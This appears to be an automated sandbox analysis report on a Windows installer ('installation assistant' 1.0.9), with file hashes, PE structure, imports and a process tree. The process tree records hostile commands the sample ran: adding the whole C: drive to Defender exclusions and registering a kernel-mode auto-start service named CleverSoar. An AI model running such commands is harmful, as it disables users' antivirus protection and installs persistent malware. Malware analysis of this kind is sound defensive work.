                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulxmH/lZ:NllUg
                              MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                              SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                              SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                              SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                              Malicious:false
                              Preview:@...e................................. ..............@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:ASCII text, with CRLF, CR line terminators
                              Category:dropped
                              Size (bytes):406
                              Entropy (8bit):5.117520345541057
                              Encrypted:false
                              SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                              MD5:9200058492BCA8F9D88B4877F842C148
                              SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                              SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                              SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                              Malicious:false
                              Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.921220316367972
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.04%
                              • Inno Setup installer (109748/4) 1.08%
                              • InstallShield setup (43055/19) 0.42%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              File name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              File size:5'707'684 bytes
                              MD5:ff430c30f7b9f0550f6b68dcc709c55b
                              SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
                              SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
                              SHA512:44cc03072673a2a2953899e75f0445d11cb3a005a4dd43091ab2fac27517ab2661562dca1a4b96c515d2a7c33d56b91fea5c98e2b7e5cbf3d1134ca69eb6da0b
                              SSDEEP:98304:XwREoZqR+RuRmr4qNb1R088uArvgOv5EcNQ+DidMwZgf:lvRz1qNz/ts
                              TLSH:3A461213F2CBE43EF0591B3715B2B15895FB6A606823AE1696ECB4ACCF350601D3E647
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:0c0c2d33ceec80aa
                              Entrypoint:0x4a83bc
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:40ab50289f7ef5fae60801f88d4541fc
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004A2EBCh
                              call 00007F1745391855h
                              xor eax, eax
                              push ebp
                              push 004A8AC1h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004A8A7Bh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004B0634h]
                              call 00007F17454231DBh
                              call 00007F1745422D2Eh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007F174541DA08h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004B41F4h
                              call 00007F174538B903h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004B41F4h]
                              mov dl, 01h
                              mov eax, dword ptr [0049CD14h]
                              call 00007F174541ED33h
                              mov dword ptr [004B41F8h], eax
                              xor edx, edx
                              push ebp
                              push 004A8A27h
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007F1745423263h
                              mov dword ptr [004B4200h], eax
                              mov eax, dword ptr [004B4200h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007F1745429F4Ah
                              mov eax, dword ptr [004B4200h]
                              mov edx, 00000028h
                              call 00007F174541F628h
                              mov edx, dword ptr [004B4200h]
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                               .rsrc | 0xcb000 | 0x11000 | 0x11000 | a38d03cb2f026a0f99883dd9fce161db | False | 0.18785903033088236 | data | 3.7213085960795746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                               RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                               RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                               RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                               RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                               RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                               RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                               RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                               RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                               RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                               RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                               RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                               RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                               RT_STRING | 0xd8e00 | 0x3f8 | data |  |  | 0.3198818897637795
                               RT_STRING | 0xd91f8 | 0x2dc | data |  |  | 0.36475409836065575
                               RT_STRING | 0xd94d4 | 0x430 | data |  |  | 0.40578358208955223
                               RT_STRING | 0xd9904 | 0x44c | data |  |  | 0.38636363636363635
                               RT_STRING | 0xd9d50 | 0x2d4 | data |  |  | 0.39226519337016574
                               RT_STRING | 0xda024 | 0xb8 | data |  |  | 0.6467391304347826
                               RT_STRING | 0xda0dc | 0x9c | data |  |  | 0.6410256410256411
                               RT_STRING | 0xda178 | 0x374 | data |  |  | 0.4230769230769231
                               RT_STRING | 0xda4ec | 0x398 | data |  |  | 0.3358695652173913
                               RT_STRING | 0xda884 | 0x368 | data |  |  | 0.3795871559633027
                               RT_STRING | 0xdabec | 0x2a4 | data |  |  | 0.4275147928994083
                               RT_RCDATA | 0xdae90 | 0x10 | data |  |  | 1.5
                               RT_RCDATA | 0xdaea0 | 0x310 | data |  |  | 0.6173469387755102
                               RT_RCDATA | 0xdb1b0 | 0x2c | data |  |  | 1.1590909090909092
                               RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                               RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                               RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                               DLL | Import
                               kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                               comctl32.dll | InitCommonControls
                               user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                               oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                               advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                               Name | Ordinal | Address
                               __dbk_fcall_wrapper | 2 | 0x40fc10
                               dbkFCallWrapperAddr | 1 | 0x4b063c
                               Language of compilation system | Country where language is spoken
                               English | United States
                              No network behavior found

                              Target ID:0
                              Start time:23:06:59
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                              Imagebase:0xec0000
                              File size:5'707'684 bytes
                              MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:23:06:59
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                              Imagebase:0x160000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Imagebase:0x7ff6e3d50000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                              Imagebase:0xec0000
                              File size:5'707'684 bytes
                              MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:false

                              Target ID:6
                              Start time:23:07:01
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                              Imagebase:0x330000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                              Imagebase:0x460000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
